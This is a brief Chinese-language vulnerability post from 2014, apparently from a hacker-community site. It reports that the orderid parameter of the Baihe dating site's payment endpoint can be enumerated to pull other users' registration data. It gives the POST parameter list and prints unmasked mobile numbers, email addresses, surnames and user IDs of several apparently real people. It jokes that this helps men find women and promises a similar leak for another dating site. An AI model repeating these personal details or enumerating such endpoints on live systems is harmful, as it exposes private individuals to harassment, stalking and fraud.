百合网注册信息泄漏之手机,邮箱,QQ下载
-
来源:黑吧安全网 浏览:901次 时间:2014-05-13
百合网用户的注册信息一览无余,里面有手机,邮箱,QQ什么的都很全啊,这下找妹子可方便多了( ̄▽ ̄),下期预告《珍爱网注册信息泄漏之手机》
payment.baihe.comPOST数据里的orderid越权了,可以遍历
servicecode=&otherPayFlag=&oppId=null&oppUserName=null&payparams=&returnurl=&paycount=&userID=马赛克&orderid=马赛克&cookie_useremail=null&insignCode=pay_3&bankCode=马赛克&alipaySignFlag=null&orderSource=&focusstarparams=&price=&sign=
返回数据:
UID/姓名/手机号/城市代码/邮箱
69549833 罗先生 15951835706 863201 347756840@qq.com
59978727 邱女士 15228858678 865101 516580356@qq.com
77501855 蔡先生 13818143139 863109 cclinter@163.com
87828462 李先生 13934369314 861411 13934369314@mobile.baihe.com
...
管理员请打马赛克